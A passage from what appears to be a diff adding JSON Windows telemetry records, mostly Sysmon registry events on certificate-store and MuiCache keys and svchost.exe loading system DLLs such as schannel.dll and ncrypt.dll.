"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903240000, + 
"unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", + "registry_value": "SCHANNEL", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" 
+ }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "schannel.dll", + "image_path": "C:\\Windows\\System32\\schannel.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mskeyprotect.dll", + "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": 
"svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": 